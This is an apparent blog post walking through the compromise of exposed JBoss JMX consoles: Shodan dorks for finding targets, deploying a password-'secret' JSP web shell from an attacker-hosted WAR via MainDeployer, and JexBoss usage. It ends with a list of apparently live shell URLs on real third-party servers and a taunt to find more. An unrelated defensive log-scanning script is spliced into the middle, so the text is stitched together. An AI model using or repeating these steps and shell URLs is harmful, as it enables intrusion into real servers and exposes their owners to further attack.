Exploiting JBoSS like a BOSS

SaN ThosH
Jul 24 · 3 min read

“So many Shells in so little time”

What is JBoss?

JBoss Application Server (JBoss AS) is an open-source, cross-platform Java application server developed by JBoss, a division of Red Hat Inc. JBoss AS is an open-source implementation of Java 2 Enterprise Edition (J2EE) that is used for implementing Java applications and other Web-based applications and software.

JBoss contains a web accessible administrator page called the JMX Console. The JMX Console is ironically plagued by the same vulnerability as Apache Tomcat Manager because it is often deployed with default, weak, or even no credentials. Also comparable to Apache Tomcat Manager, JBoss allows administrators (and attackers) to upload and publish Web application ARchive (WAR) files remotely through this admin console.

Vulnerable versions -

JBoss Application Server versions: 3, 4, 5 and 6.

Paths to Check -

/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
/web-console/ServerInfo.jsp
/invoker/JMXInvokerServlet
/admin-console/

Manually Exploiting JBoss jmx-console -

  • Create the WAR file with our JSP shell
  • Host the WAR file on a server
  • Find a publicly accessible jmx-console
  • Deploy the WAR file
  • Access the JSP shell

Shodan Dorks -

“x-powered-by” “jboss”
jboss http.favicon.hash:-656811182

Create the WAR file with our JSP shell -

I made a repository on GitHub with the WAR file.

The WAR file consists of a JSP shell.

URL to access the shell -

/fs/shell.jsp?pass=secret&cmd=whoami

Hosting the WAR file on a server -

I used Python to host it:

python -m SimpleHTTPServer 8000

Finding a publicly accessible jmx-console -

Using Shodan, I found some.

It looks like this

Deploy the WAR file -

Navigate to the JMX Console on the target host (http://IP:port/jmx-console/) and search for “service=MainDeployer”.

Now, using the “void deploy()” operation, we are going to deploy our WAR file.

This operation takes a java.net.URL as its parameter value. In that field, enter your attack IP and the name of the WAR file in the URL box, then click the “Invoke” button.

If it is successfully deployed, it will show a message like the one below.

Accessing the JSP shell -

The JSP shell on the target can be found at /fs/shell.jsp.

Note that the JSP shell from ‘RedTeam Pentesting’ requires a password. By default the password is “secret”.

http://203.196.40.169:8090/fs/shell.jsp?cmd=whoami&html=true&pass=secret
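The deployment and shell-access steps above each leave a distinct trace in the application server's HTTP access log. The following is an added example, not code from the post or from any project mentioned in it, that shows how a defender can pick those traces out: it parses combined-format access log lines, flags requests to the admin paths listed earlier, singles out MainDeployer invocations through the HtmlAdaptor and POSTs to the JMXInvokerServlet, and flags any JSP reached with a cmd= parameter, which matches the interface of the shell described here. The log lines are constructed for the example (RFC 5737 documentation addresses) and the field layout assumes the common Apache/Tomcat combined log format; nothing here is a real incident.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/Tomcat combined-style access log (assumed layout; the constructed sample below follows it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Paths named in the post that must never answer to unauthenticated clients.
ADMIN_PREFIXES = ("/jmx-console/", "/web-console/", "/invoker/", "/admin-console/")

# Constructed sample log: one deploy-and-shell sequence, one refused probe, one benign request.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Jul/2019:10:01:02 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:service=MainDeployer HTTP/1.1" 200 14321
203.0.113.10 - - [24/Jul/2019:10:01:09 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&arg0=http://203.0.113.10:8000/fs.war HTTP/1.1" 200 1187
203.0.113.10 - - [24/Jul/2019:10:01:15 +0000] "GET /fs/shell.jsp?pass=secret&cmd=whoami HTTP/1.1" 200 512
198.51.100.7 - - [24/Jul/2019:10:02:00 +0000] "GET /web-console/ServerInfo.jsp HTTP/1.1" 401 0
198.51.100.7 - - [24/Jul/2019:10:02:05 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 340
192.0.2.5 - - [24/Jul/2019:10:03:00 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 2048
"""


def classify(entry):
    """Map one parsed log entry to (severity, reason), or None when it looks benign."""
    parts = urlsplit(entry["target"])
    path, qs = parts.path, parse_qs(parts.query)

    def first(key):
        return qs.get(key, [""])[0]

    method = entry["method"]
    if path.startswith("/jmx-console/HtmlAdaptor"):
        # The console's own form POSTs its parameters, which the access log does not
        # record, so any POST is flagged; the same parameters can also arrive as a GET query.
        if method == "POST":
            return "high", "POST to JMX console HtmlAdaptor (operation not visible in access log)"
        if first("action") == "invokeOp" and "service=MainDeployer" in first("name"):
            return "critical", f"MainDeployer operation invoked, argument {first('arg0')!r}"
        return "high", f"JMX console HtmlAdaptor reached ({first('action') or 'no action'})"
    if path.startswith("/invoker/JMXInvokerServlet") and method == "POST":
        return "critical", "POST to JMXInvokerServlet (serialized invocation)"
    if path.startswith(ADMIN_PREFIXES):
        return "medium", f"admin console path requested: {path}"
    if path.endswith(".jsp") and "cmd" in qs:
        # A cmd= parameter on a JSP matches the interface of the shell described in the post.
        return "critical", f"command parameter sent to JSP {path}: cmd={first('cmd')!r}"
    return None


def scan(log_text):
    """Return one finding dict per suspicious line, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        entry["status"] = int(entry["status"])
        hit = classify(entry)
        if hit is None:
            continue
        severity, reason = hit
        if entry["status"] in (401, 403):
            # The server refused the request: keep it for context, but do not page on it.
            severity, reason = "info", f"{reason} (rejected with {entry['status']})"
        findings.append({"ip": entry["ip"], "ts": entry["ts"], "severity": severity,
                         "reason": reason, "target": entry["target"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']:8}] {f['ts']} {f['ip']} {f['reason']}")
```

Run as-is to see the five findings from the constructed sample; point `scan()` at a real access log to hunt for the same sequence. A 200 on any of the admin prefixes from an address outside your management network is the finding that matters most, because it means the console answered without credentials, which is exactly the condition the post relies on.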

Automating using JexBoss -

joaomatosf wrote an exploitation tool for the JBoss Application Server and other Java platforms, frameworks, applications, etc.

Usage-

python jexboss.py -host http://target_host:8080

http://103.38.15.81:8081/fs/shell.jsp?pass=secret&cmd=whoami
http://52.14.233.11:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://34.197.157.79:8090//fs/shell.jsp?pass=secret&cmd=whoami
http://14.192.159.214:8080/fs/shell.jsp?pass=secret&cmd=whoami
https://13.232.144.35:8443/fs/shell.jsp?pass=secret&cmd=whoami
http://13.234.45.168:8080/fs/shell.jsp?pass=secret&cmd=dir
http://103.211.80.23:3541/fs/shell.jsp?pass=secret&cmd=whoami
http://190.48.127.45:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://41.64.20.50:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://203.196.40.169:8090/fs/shell.jsp?pass=secret&cmd=whoami
http://222.92.88.242:8086/fs/shell.jsp?pass=secret&cmd=whoami
http://200.18.67.52:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://177.131.177.93:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://222.180.200.190:9080/fs/shell.jsp?pass=secret&cmd=whoami
http://59.89.197.92:8080/fs/shell.jsp?pass=secret&cmd=whoami
https://web.unimeditapetininga.com.br/fs/shell.jsp?pass=secret&cmd=dir
Go find some by yourself
